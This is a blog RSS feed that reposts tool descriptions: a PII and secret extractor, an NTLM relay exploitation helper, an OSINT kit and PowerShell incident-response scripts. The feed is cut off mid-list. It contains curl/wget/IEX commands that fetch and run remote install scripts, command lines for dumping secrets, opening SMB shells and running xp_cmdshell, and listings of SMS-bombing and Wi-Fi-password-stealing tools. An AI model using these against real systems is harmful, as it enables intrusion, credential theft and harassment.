<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Tools Archives - Tech Chronicles</title>
	<atom:link href="http://kostacipo.stream/category/tools/feed/" rel="self" type="application/rss+xml" />
	<link>https://kostacipo.stream/category/tools/</link>
	<description>Ramblings of a Tech Dude</description>
	<lastBuildDate>Sun, 02 Jun 2024 21:44:07 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.2</generator>

<image>
	<url>https://kostacipo.stream/wp-content/uploads/2019/12/cropped-profile-32x32.jpg</url>
	<title>Tools Archives - Tech Chronicles</title>
	<link>https://kostacipo.stream/category/tools/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>DataSurgeon – Extract Sensitive Information (PII) From Logs</title>
		<link>http://kostacipo.stream/datasurgeon-extract-sensitive-information-pii-from-logs/</link>
					<comments>http://kostacipo.stream/datasurgeon-extract-sensitive-information-pii-from-logs/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Sun, 02 Jun 2024 21:44:07 +0000</pubDate>
				<category><![CDATA[Data]]></category>
		<category><![CDATA[Exploitation Tools]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[extracting information]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2207</guid>

					<description><![CDATA[<p>DataSurgeon (ds) is a versatile tool designed for incident response, DLP, penetration testing, and CTF challenges. It allows for the extraction of various types of sensitive information including emails, phone numbers, hashes, credit cards, URLs, IP addresses, MAC addresses, SRV DNS records and a lot more! Supports Windows, Linux and MacOS Support recursive file analysis [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/datasurgeon-extract-sensitive-information-pii-from-logs/">DataSurgeon – Extract Sensitive Information (PII) From Logs</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p dir="auto">DataSurgeon (ds) is a versatile tool designed for incident response, DLP, penetration testing, and CTF challenges. It allows for the extraction of various types of sensitive information including emails, phone numbers, hashes, credit cards, URLs, IP addresses, MAC addresses, SRV DNS records and a lot more!</p>
<ul dir="auto">
<li>Supports Windows, Linux and MacOS</li>
<li>Support recursive file analysis within directories</li>
<li>Plugin Support</li>
<li>CSV Output</li>
</ul>
<h2 class="wp-block-heading">DataSurgeon – Extract Sensitive Information (PII) From Logs Features</h2>
<p>DataSurgeon is able to extract:</p>
<ul>
<li>Emails</li>
<li>Files</li>
<li>Phone numbers</li>
<li>Credit Cards</li>
<li>Google API Private Key ID’s</li>
<li>Social Security Numbers</li>
<li>AWS Keys</li>
<li>Bitcoin wallets</li>
<li>URL’s</li>
<li>IPv4 Addresses and IPv6 addresses</li>
<li>MAC Addresses</li>
<li>SRV DNS Records</li>
<li>Extract Hashes
<ul>
<li>MD4 &amp; MD5</li>
<li>SHA-1, SHA-224, SHA-256, SHA-384, SHA-512</li>
<li>SHA-3 224, SHA-3 256, SHA-3 384, SHA-3 512</li>
<li>MySQL 323, MySQL 41</li>
<li>NTLM</li>
<li>bcrypt</li>
</ul>
</li>
</ul>
<div class="markdown-heading" dir="auto">
<h1 class="heading-element" dir="auto" tabindex="-1">Extraction Features</h1>
</div>
<p dir="auto">To learn how to manage plugins please follow the guide <a href="https://github.com/Drew-Alleman/DataSurgeon?tab=readme-ov-file#managing-plugins">here</a>.</p>
<div class="markdown-heading" dir="auto">
<h2 class="heading-element" dir="auto" tabindex="-1">Personal Information</h2>
</div>
<ul dir="auto">
<li>Emails</li>
<li>Phone numbers</li>
<li>Social Security Numbers</li>
</ul>
<div class="markdown-heading" dir="auto">
<h2 class="heading-element" dir="auto" tabindex="-1">Financial Information</h2>
</div>
<ul dir="auto">
<li>Credit Cards</li>
<li>Bitcoin wallets</li>
</ul>
<div class="markdown-heading" dir="auto">
<h2 class="heading-element" dir="auto" tabindex="-1">Network Information</h2>
</div>
<ul dir="auto">
<li>URL&#8217;s</li>
<li>IPv4 Addresses and IPv6 addresses</li>
<li>MAC Addresses</li>
<li>SRV DNS Records</li>
</ul>
<div class="markdown-heading" dir="auto">
<h2 class="heading-element" dir="auto" tabindex="-1">Security Information</h2>
</div>
<ul dir="auto">
<li>Google API Private Key ID&#8217;s</li>
<li>AWS Keys</li>
<li><a href="https://github.com/DataSurgeon-ds/ds-cve-plugin/">CVE Numbers</a> (PLUGIN)</li>
</ul>
<div class="markdown-heading" dir="auto">
<h2 class="heading-element" dir="auto" tabindex="-1">System and File Information</h2>
</div>
<ul dir="auto">
<li>Files</li>
<li><a href="https://github.com/Drew-Alleman/ds-winreg-plugin/">Windows Registries</a> (PLUGIN)</li>
</ul>
<div class="markdown-heading" dir="auto">
<h2 class="heading-element" dir="auto" tabindex="-1">Hashes</h2>
</div>
<ul dir="auto">
<li>MD4 &amp; MD5</li>
<li>SHA-1, SHA-224, SHA-256, SHA-384, SHA-512</li>
<li>SHA-3 224, SHA-3 256, SHA-3 384, SHA-3 512</li>
<li>MySQL 323, MySQL 41</li>
<li>NTLM</li>
<li>bcrypt</li>
</ul>
<div class="markdown-heading" dir="auto">
<h1 class="heading-element" dir="auto" tabindex="-1">Quick Install</h1>
</div>
<p dir="auto">The quick installer can also be used to update DataSurgeon.</p>
<div class="markdown-heading" dir="auto">
<h2 class="heading-element" dir="auto" tabindex="-1">Video Guide</h2>
</div>
<p dir="auto"><a href="https://www.youtube.com/watch?v=_Sq8Qgndi4M" rel="nofollow"><img decoding="async" src="https://camo.githubusercontent.com/5d1c80aff1e766a49889ca499e93528c5faa816c581d7f098d67c01b9bf85b98/68747470733a2f2f696d672e796f75747562652e636f6d2f76692f5f53713851676e6469344d2f302e6a7067" alt="Guide" data-canonical-src="https://img.youtube.com/vi/_Sq8Qgndi4M/0.jpg" /></a></p>
<p dir="auto">Install <a href="https://www.rust-lang.org/tools/install" rel="nofollow">Rust</a> and <a href="https://git-scm.com/downloads" rel="nofollow">Github</a> then RESTART YOUR TERMINAL.</p>
<div class="markdown-heading" dir="auto">
<h3 class="heading-element" dir="auto" tabindex="-1">Linux</h3>
</div>
<pre class="notranslate"><code>read -p "Would you like to add 'ds' to your local bin? This will make 'ds' executable from any location in your terminal. (y/n) " response &amp;&amp; wget -q -O - https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | bash -s -- "$response"</code></pre>
<div class="markdown-heading" dir="auto">
<h3 class="heading-element" dir="auto" tabindex="-1">Windows</h3>
</div>
<p dir="auto">Enter the line below in an elevated powershell window.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.ps1")
</code></pre>
</div>
<p dir="auto">Relaunch your terminal and you will be able to use <code>ds</code> from the command line.</p>
<div class="markdown-heading" dir="auto">
<h3 class="heading-element" dir="auto" tabindex="-1">Mac</h3>
</div>
<pre class="notranslate"><code>curl --proto '=https' --tlsv1.2 -sSf https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | sh
</code></pre>
<div class="markdown-heading" dir="auto">
<h1 class="heading-element" dir="auto" tabindex="-1">Command Line Arguments</h1>
<p><a id="user-content-command-line-arguments" class="anchor" href="https://github.com/Drew-Alleman/DataSurgeon?tab=readme-ov-file#command-line-arguments" aria-label="Permalink: Command Line Arguments"></a></div>
<p dir="auto"><a href="https://github.com/Drew-Alleman/DataSurgeon/blob/main/media/help_preview.PNG" target="_blank" rel="noopener noreferrer"><img decoding="async" src="https://github.com/Drew-Alleman/DataSurgeon/raw/main/media/help_preview.PNG" alt="help" /></a></p>
<div class="markdown-heading" dir="auto">
<h2 class="heading-element" dir="auto" tabindex="-1">Video Guide</h2>
<p><a id="user-content-video-guide-1" class="anchor" href="https://github.com/Drew-Alleman/DataSurgeon?tab=readme-ov-file#video-guide-1" aria-label="Permalink: Video Guide"></a></div>
<p dir="auto"><a href="https://www.youtube.com/watch?v=LAb6kBOWHwg" rel="nofollow"><img decoding="async" src="https://camo.githubusercontent.com/e40dff9c770486170825e0cfa662c8ab41312ba1f9f2f19a91712e46084ee07b/68747470733a2f2f696d672e796f75747562652e636f6d2f76692f4c4162366b424f574877672f302e6a7067" alt="Video Title" data-canonical-src="https://img.youtube.com/vi/LAb6kBOWHwg/0.jpg" /></a></p>
<div class="markdown-heading" dir="auto">
<h1 class="heading-element" dir="auto" tabindex="-1">Examples</h1>
</div>
<div class="markdown-heading" dir="auto">
<h2 class="heading-element" dir="auto" tabindex="-1">Extracting Files From a Remote Webiste</h2>
<p><a id="user-content-extracting-files-from-a-remote-webiste" class="anchor" href="https://github.com/Drew-Alleman/DataSurgeon?tab=readme-ov-file#extracting-files-from-a-remote-webiste" aria-label="Permalink: Extracting Files From a Remote Webiste"></a></div>
<p dir="auto">Here I use <code>wget</code> to make a request to stackoverflow then I forward the body text to <code>ds</code> . The <code>-F</code> option will list all files found. <code>--clean</code> is used to remove any extra text that might have been returned (such as extra html). Then the result of is sent to <code>uniq</code> which removes any non unique files found. Ig you wanted you can remove the warning message at the top &#8216;Reading standard input..&#8217; by using -S.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>$ wget -qO - https://www.stackoverflow.com | ds -F --clean | uniq
</code></pre>
</div>
<p dir="auto"><a href="https://github.com/Drew-Alleman/DataSurgeon/blob/main/media/wget_preview.gif" target="_blank" rel="noopener noreferrer" data-target="animated-image.originalLink"><img decoding="async" src="https://github.com/Drew-Alleman/DataSurgeon/raw/main/media/wget_preview.gif" alt="preview" data-target="animated-image.originalImage" /></a></p>
<div class="markdown-heading" dir="auto">
<h2 class="heading-element" dir="auto" tabindex="-1">Extracting Mac Addresses From an Output File</h2>
<p><a id="user-content-extracting-mac-addresses-from-an-output-file" class="anchor" href="https://github.com/Drew-Alleman/DataSurgeon?tab=readme-ov-file#extracting-mac-addresses-from-an-output-file" aria-label="Permalink: Extracting Mac Addresses From an Output File"></a></div>
<p dir="auto">Here I am pulling all mac addresses found in <a href="https://github.com/Drew-Alleman/autodeauth">autodeauth&#8217;s</a> log file using the <code>-m</code> query. The <code>--hide</code> option will hide the identifer string infront of the results. In this case &#8216;mac_address: &#8216; is hidden from the output. The <code>-T</code> option is used to check the same line multiple times for matches. Normallly when a match is found the tool moves on to the next line rather then checking again.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>$ ./ds -m -T --hide -f /var/log/autodeauth/log     
2023-02-26 00:28:19 - Sending 500 deauth frames to network: BC:2E:48:E5:DE:FF -- PrivateNetwork
2023-02-26 00:35:22 - Sending 500 deauth frames to network: 90:58:51:1C:C9:E1 -- TestNet
</code></pre>
</div>
<div class="markdown-heading" dir="auto">
<h2 class="heading-element" dir="auto" tabindex="-1">Reading all files in a directory</h2>
</div>
<p dir="auto">You can use the <code>--directory</code> option to read all files in the specified directory recursively. The <code>-D</code> option is used to display the filename where the match was found. <code>-l</code> or <code>--line</code> is used to display the line number the content was found on.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code>$ ds --directory test_dir/ -Dl
</code></pre>
</div>
<p dir="auto"><a href="https://github.com/Drew-Alleman/DataSurgeon/blob/main/media/directory_search.gif" target="_blank" rel="noopener noreferrer" data-target="animated-image.originalLink"><img decoding="async" src="https://github.com/Drew-Alleman/DataSurgeon/raw/main/media/directory_search.gif" alt="preview" data-target="animated-image.originalImage" /></a></p>
<div class="markdown-heading" dir="auto">
<h2 class="heading-element" dir="auto" tabindex="-1">CSV Output</h2>
</div>
<p dir="auto">To output your results to a CSV file, use the <code>-o</code> option followed by the name of the file you want to save your data to. The <code>-D</code> and <code>-X</code> are supported. The format is: <code>ds -o &lt;FILENAME&gt;.csv</code> (.csv is needed).</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto">
<pre class="notranslate"><code> $ wget -qO - https://www.stackoverflow.com | ds -o output.csv -C
</code></pre>
<div class="zeroclipboard-container"></div>
</div>
<p dir="auto"><a href="https://github.com/Drew-Alleman/DataSurgeon/blob/main/media/csv_output.gif" target="_blank" rel="noopener noreferrer" data-target="animated-image.originalLink"><img decoding="async" src="https://github.com/Drew-Alleman/DataSurgeon/raw/main/media/csv_output.gif" alt="preview" data-target="animated-image.originalImage" /></a></p>
<div class="markdown-heading" dir="auto">
<h1 class="heading-element" dir="auto" tabindex="-1">Speed Tests</h1>
</div>
<p dir="auto">When no specific query is provided, <code>ds</code> will search through all possible types of data, which is <b>SIGNIFICANTLY</b> slower than using individual queries. The slowest query is <code>--files</code>. Its also slightly faster to use <code>cat</code> to pipe the data to <code>ds</code>.</p>
<p dir="auto">Below is the elapsed time when processing a 5GB test file generated by <a href="https://github.com/Drew-Alleman/ds-test">ds-test</a>. Each test was ran 3 times and the average time was recorded.</p>
<div class="markdown-heading" dir="auto">
<h3 class="heading-element" dir="auto" tabindex="-1">Computer Specs</h3>
<p><a id="user-content-computer-specs" class="anchor" href="https://github.com/Drew-Alleman/DataSurgeon?tab=readme-ov-file#computer-specs" aria-label="Permalink: Computer Specs"></a></div>
<pre class="notranslate"><code>Processor	Intel(R) Core(TM) i5-10400F CPU @ 2.90GHz, 2904 Mhz, 6 Core(s), 12 Logical Processor(s)
Ram         12.0 GB (11.9 GB usable)
</code></pre>
<div class="markdown-heading" dir="auto">
<h2 class="heading-element" dir="auto" tabindex="-1">Searching all data types</h2>
</div>
<table>
<thead>
<tr>
<th>Command</th>
<th>Speed</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>cat test.txt | ds -t</code></td>
<td>00h:02m:04s</td>
</tr>
<tr>
<td><code>ds -t -f test.txt</code></td>
<td>00h:02m:05s</td>
</tr>
<tr>
<td><code>cat test.txt | ds -t -o output.txt</code></td>
<td>00h:02m:06s</td>
</tr>
</tbody>
</table>
<div class="markdown-heading" dir="auto">
<h2 class="heading-element" dir="auto" tabindex="-1">Using specific queries</h2>
</div>
<table>
<thead>
<tr>
<th>Command</th>
<th>Speed</th>
<th>Query Count</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>cat test.txt | ds -t -6</code></td>
<td>00h:00m:12s</td>
<td>1</td>
</tr>
<tr>
<td><code>cat test.txt | ds -t -i -m</code></td>
<td>00h:00m:22</td>
<td>2</td>
</tr>
<tr>
<td><code>cat test.txt | ds -tF6c</code></td>
<td>00h:00m:32s</td>
<td>3</td>
</tr>
</tbody>
</table>
<p>The post <a href="http://kostacipo.stream/datasurgeon-extract-sensitive-information-pii-from-logs/">DataSurgeon – Extract Sensitive Information (PII) From Logs</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/datasurgeon-extract-sensitive-information-pii-from-logs/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>NTLM Relay Gat – Automating Exploitation Of NTLM Relay Vulnerabilities</title>
		<link>http://kostacipo.stream/ntlm-relay-gat-automating-exploitation-of-ntlm-relay-vulnerabilities/</link>
					<comments>http://kostacipo.stream/ntlm-relay-gat-automating-exploitation-of-ntlm-relay-vulnerabilities/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Sat, 02 Mar 2024 23:16:38 +0000</pubDate>
				<category><![CDATA[Exploitation Tools]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[Networks]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[ntlm]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2196</guid>

					<description><![CDATA[<p>NTLM Relay Gat revolutionizes the approach to exploiting NTLM relay vulnerabilities by automating the use of the Impacket suite’s ntlmrelayx.py tool. Designed for both novices and experienced cybersecurity professionals, this tool streamlines the process of identifying and exploiting weaknesses in network security. With its user-friendly interface and powerful features, NTLM Relay Gat serves as a [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/ntlm-relay-gat-automating-exploitation-of-ntlm-relay-vulnerabilities/">NTLM Relay Gat – Automating Exploitation Of NTLM Relay Vulnerabilities</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>NTLM Relay Gat revolutionizes the approach to exploiting NTLM relay vulnerabilities by automating the use of the Impacket suite’s ntlmrelayx.py tool.</p>
<p>Designed for both novices and experienced cybersecurity professionals, this tool streamlines the process of identifying and exploiting weaknesses in network security.</p>
<p>With its user-friendly interface and powerful features, NTLM Relay Gat serves as a critical asset in the toolkit of ethical hackers and penetration testers aiming to enhance their network defense strategies.</p>
<h2 class="wp-block-heading"><strong>Description</strong></h2>
<p>NTLM Relay Gat is a powerful tool designed to automate the exploitation of NTLM relays using <code>ntlmrelayx.py</code> from the Impacket tool suite. By leveraging the capabilities of <code>ntlmrelayx.py</code>, NTLM Relay Gat streamlines the process of exploiting NTLM relay vulnerabilities, offering a range of functionalities from listing SMB shares to executing commands on MSSQL databases.</p>
<h2 class="wp-block-heading"><strong>Features</strong></h2>
<ul>
<li><strong>Multi-threading Support</strong>: Utilize multiple threads to perform actions concurrently.</li>
<li><strong>SMB Shares Enumeration</strong>: List available SMB shares.</li>
<li><strong>SMB Shell Execution</strong>: Execute a shell via SMB.</li>
<li><strong>Secrets Dumping</strong>: Dump secrets from the target.</li>
<li><strong>MSSQL Database Enumeration</strong>: List available MSSQL databases.</li>
<li><strong>MSSQL Command Execution</strong>: Execute operating system commands via xp_cmdshell or start SQL Server Agent jobs.</li>
</ul>
<h2 class="wp-block-heading"><strong>Prerequisites</strong></h2>
<p>Before you begin, ensure you have met the following requirements:</p>
<ul>
<li><code>proxychains</code> properly configured with ntlmrelayx SOCKS relay port</li>
<li>Python 3.6+</li>
</ul>
<h2 class="wp-block-heading"><strong>Installation</strong></h2>
<p>To install NTLM Relay Gat, follow these steps:</p>
<ol>
<li>Ensure that Python 3.6 or higher is installed on your system.</li>
<li>Clone NTLM Relay Gat repository:</li>
</ol>
<pre class="wp-block-code"><code>git clone https://github.com/ad0nis/ntlm_relay_gat.git
cd ntlm_relay_gat</code></pre>
<p>Install dependencies, if you don’t have them installed already:</p>
<pre class="wp-block-code"><code>pip install -r requirements.txt</code></pre>
<p>NTLM Relay Gat is now installed and ready to use.</p>
<h2 class="wp-block-heading"><strong>Usage</strong></h2>
<p>To use NTLM Relay Gat, make sure you’ve got relayed sessions in <code>ntlmrelayx.py</code>‘s <code>socks</code> command output and that you have proxychains configured to use <code>ntlmrelayx.py</code>‘s proxy, and then execute the script with the desired options. Here are some examples of how to run NTLM Relay Gat:</p>
<pre class="wp-block-code"><code># List available SMB shares using 10 threads
python ntlm_relay_gat.py --smb-shares -t 10

# Execute a shell via SMB
python ntlm_relay_gat.py --smb-shell --shell-path /path/to/shell

# Dump secrets from the target
python ntlm_relay_gat.py --dump-secrets

# List available MSSQL databases
python ntlm_relay_gat.py --mssql-dbs

# Execute an operating system command via xp_cmdshell
python ntlm_relay_gat.py --mssql-exec --mssql-method 1 --mssql-command 'whoami'</code></pre>
<p>The post <a href="http://kostacipo.stream/ntlm-relay-gat-automating-exploitation-of-ntlm-relay-vulnerabilities/">NTLM Relay Gat – Automating Exploitation Of NTLM Relay Vulnerabilities</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/ntlm-relay-gat-automating-exploitation-of-ntlm-relay-vulnerabilities/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>H4X-Tools &#8211; Designed for Scraping, OSINT and Beyond</title>
		<link>http://kostacipo.stream/h4x-tools-designed-for-scraping-osint-and-beyond/</link>
					<comments>http://kostacipo.stream/h4x-tools-designed-for-scraping-osint-and-beyond/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 21 Feb 2024 23:53:50 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Exploitation Tools]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[scraping]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2184</guid>

					<description><![CDATA[<p>Discover the power of H4X-Tools, a versatile toolkit designed for scraping, OSINT (Open-Source Intelligence), and beyond. From extracting information from social media accounts to conducting phone and IP lookups, H4X-Tools offers a wide array of functionalities to aid researchers, developers, and security enthusiasts alike. Explore its features, installation process, and community-driven development in this article. [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/h4x-tools-designed-for-scraping-osint-and-beyond/">H4X-Tools &#8211; Designed for Scraping, OSINT and Beyond</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Discover the power of H4X-Tools, a versatile toolkit designed for scraping, OSINT (Open-Source Intelligence), and beyond.</p>
<p>From extracting information from social media accounts to conducting phone and IP lookups, H4X-Tools offers a wide array of functionalities to aid researchers, developers, and security enthusiasts alike.</p>
<p>Explore its features, installation process, and community-driven development in this article. Toolkit for scraping, OSINT and more.</p>
<p>Submit feature requests and bugs in the <a href="https://github.com/V1li/H4X-Tools/issues" target="_blank" rel="noreferrer noopener nofollow">issues</a> tab.</p>
<p>If you want to help with the development, follow the instructions in <a href="https://github.com/vil/H4X-Tools/blob/master/CONTRIBUTING.md" target="_blank" rel="noreferrer noopener nofollow">contributing</a> and simply open a pull request. You can also <a href="https://vili.dev/#donate" target="_blank" rel="noreferrer noopener nofollow">donate</a> to keep the project alive and me motivated!</p>
<h2 class="wp-block-heading"><strong>Current Tools</strong></h2>
<h3 class="wp-block-heading"><strong>Warning</strong></h3>
<p>Some tools might not work on Windows systems.</p>
<figure class="wp-block-table">
<table>
<thead>
<tr>
<th>Tool Name</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ig Scrape</td>
<td>Scrapes information from IG accounts.</td>
</tr>
<tr>
<td>Web Search</td>
<td>Searches the internet for the given query.</td>
</tr>
<tr>
<td>Phone Lookup</td>
<td>Looks up a phone number and returns information about it.</td>
</tr>
<tr>
<td>Ip Lookup</td>
<td>Looks up an IP/domain address and returns information about it.</td>
</tr>
<tr>
<td>Port Scanner</td>
<td>Scans for open ports in a given IP/domain address.</td>
</tr>
<tr>
<td>Username Search</td>
<td>Tries to find a given username from many different websites.</td>
</tr>
<tr>
<td>Email Search</td>
<td>Efficiently finds registered accounts from a given email. Thanks to <a href="https://github.com/megadose/holehe" target="_blank" rel="noreferrer noopener nofollow">holehe.</a></td>
</tr>
<tr>
<td>Webhook Spammer</td>
<td>Spams messages to a discord webhook.</td>
</tr>
<tr>
<td>WhoIs Lookup</td>
<td>Looks up a domain and returns information about it.</td>
</tr>
<tr>
<td>SMS Bomber</td>
<td>Spams messages to a given mobile number.</td>
</tr>
<tr>
<td>Fake Info Generator</td>
<td>Generates fake information using <a href="https://pypi.org/project/Faker/" target="_blank" rel="noreferrer noopener nofollow">Faker</a>.</td>
</tr>
<tr>
<td>Web Scrape</td>
<td>Scrapes links from a given url.</td>
</tr>
<tr>
<td>Wi-Fi Finder</td>
<td>Scans for nearby Wi-Fi networks.</td>
</tr>
<tr>
<td>Wi-Fi Password Getter</td>
<td>Scans for locally saved Wi-Fi passwords.</td>
</tr>
<tr>
<td>Dir Buster</td>
<td>Bruteforce directories on a website.</td>
</tr>
<tr>
<td>Local Accounts Getter</td>
<td>Scans for all local accounts and their information.</td>
</tr>
<tr>
<td>Caesar Cipher</td>
<td>Encrypts/decrypts/bruteforce a message using the Caesar cipher.</td>
</tr>
<tr>
<td>BaseXX</td>
<td>Encodes/decodes a message using Base64/32/16.</td>
</tr>
<tr>
<td>About</td>
<td>Tells you about the tool.</td>
</tr>
<tr>
<td>Donate</td>
<td>My crypto addresses where to donate.</td>
</tr>
<tr>
<td>Exit</td>
<td>Exits the tool.</td>
</tr>
</tbody>
</table>
</figure>
<h2 class="wp-block-heading"><strong>Note</strong></h2>
<p>-IG Scrape requires you to log in, in order to use it.</p>
<p>-SMS Bomber only works with US numbers.</p>
<p>-You might get rate limited after using some of the tools for too long.</p>
<h2 class="wp-block-heading"><strong>Installation</strong></h2>
<p>I’ll upload already built executables to the <a href="https://github.com/vil/H4X-Tools/releases" target="_blank" rel="noreferrer noopener nofollow">releases</a> tab, but I’d recommend installing the tool manually by following the instructions below. This way you also get the freshest version.</p>
<h2 class="wp-block-heading"><strong>Setup</strong></h2>
<p>Important</p>
<p>Make sure you have <a href="https://www.python.org/downloads/" target="_blank" rel="noreferrer noopener nofollow">Python</a> and <a href="https://git-scm.com/downloads" target="_blank" rel="noreferrer noopener nofollow">Git</a> installed.</p>
<p>View the <a href="https://github.com/vil/H4X-Tools/wiki" target="_blank" rel="noreferrer noopener nofollow">wiki page</a> for more detailed tutorial.</p>
<h2 class="wp-block-heading"><strong>Linux</strong></h2>
<ol>
<li>Clone the repo <code>git clone https://github.com/vil/h4x-tools.git</code></li>
<li>Change directory <code>cd h4x-tools</code></li>
<li>Run <code>sh setup.sh</code> in terminal to install the tool.</li>
</ol>
<h2 class="wp-block-heading"><strong>Windows</strong></h2>
<ol>
<li>Clone the repo <code>git clone https://github.com/vil/h4x-tools.git</code></li>
<li>Change directory <code>cd h4x-tools</code></li>
<li>Run the <code>setup.bat</code> file.</li>
</ol>
<p>Setup files will automatically build the tool as an executable. You can also run the tool using <code>python h4xtools.py</code> in the terminal.</p>
<p>Also, dependencies can be installed manually using <code>pip install -r requirements.txt</code>.</p>
<p>The post <a href="http://kostacipo.stream/h4x-tools-designed-for-scraping-osint-and-beyond/">H4X-Tools &#8211; Designed for Scraping, OSINT and Beyond</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/h4x-tools-designed-for-scraping-osint-and-beyond/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Powershell Digital Forensics And Incident Response (DFIR) – Leveraging Scripts For Effective Cybersecurity</title>
		<link>http://kostacipo.stream/powershell-digital-forensics-and-incident-response-dfir-leveraging-scripts-for-effective-cybersecurity/</link>
					<comments>http://kostacipo.stream/powershell-digital-forensics-and-incident-response-dfir-leveraging-scripts-for-effective-cybersecurity/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 21 Feb 2024 23:49:00 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[General]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Wargames]]></category>
		<category><![CDATA[Powershell Digital Forensics]]></category>
		<guid isPermaLink="false">https://kostacipo.stream/?p=2181</guid>

					<description><![CDATA[<p>This repository contains multiple PowerShell scripts that can help you respond to cyber attacks on Windows Devices. The following Incident Response scripts are included: DFIR Script: Collects all items as listed in section DFIR Script. CollectWindowsEvents: Collects all Windows events and outputs it as CSV. CollectWindowsSecurityEvents: Collects all Windows security events and outputs it as CSV. [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/powershell-digital-forensics-and-incident-response-dfir-leveraging-scripts-for-effective-cybersecurity/">Powershell Digital Forensics And Incident Response (DFIR) – Leveraging Scripts For Effective Cybersecurity</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This repository contains multiple PowerShell scripts that can help you respond to cyber attacks on Windows Devices.</p>
<p>The following Incident Response scripts are included:</p>
<ul>
<li><a href="https://github.com/Bert-JanP/Incident-Response-Powershell/blob/main/DFIR-Script.ps1" target="_blank" rel="noreferrer noopener nofollow">DFIR Script</a>: Collects all items as listed in section <a href="https://github.com/Bert-JanP/Incident-Response-Powershell#dfir-script" target="_blank" rel="noreferrer noopener nofollow">DFIR Script</a>.</li>
<li><a href="https://github.com/Bert-JanP/Incident-Response-Powershell/blob/main/Scripts/CollectWindowsEvents.ps1" target="_blank" rel="noreferrer noopener nofollow">CollectWindowsEvents</a>: Collects all Windows events and outputs it as CSV.</li>
<li><a href="https://github.com/Bert-JanP/Incident-Response-Powershell/blob/main/Scripts/CollectWindowsSecurityEvents.ps1" target="_blank" rel="noreferrer noopener nofollow">CollectWindowsSecurityEvents</a>: Collects all Windows security events and outputs it as CSV.</li>
<li><a href="https://github.com/Bert-JanP/Incident-Response-Powershell/blob/main/Scripts/CollectPnPDevices.ps1" target="_blank" rel="noreferrer noopener nofollow">CollectPnPDevices</a>: Collects all Plug and Play devices, such as USB, Network and Storage.</li>
<li><a href="https://github.com/Bert-JanP/Incident-Response-Powershell/blob/main/Scripts/DumpLocalAdmins.ps1" target="_blank" rel="noreferrer noopener nofollow">DumpLocalAdmins</a>: Returns all local admins of a device.</li>
<li><a href="https://github.com/Bert-JanP/Incident-Response-Powershell/blob/main/Scripts/LastLogons.ps1" target="_blank" rel="noreferrer noopener nofollow">LastLogons</a> – List the last N successful logins of a device.</li>
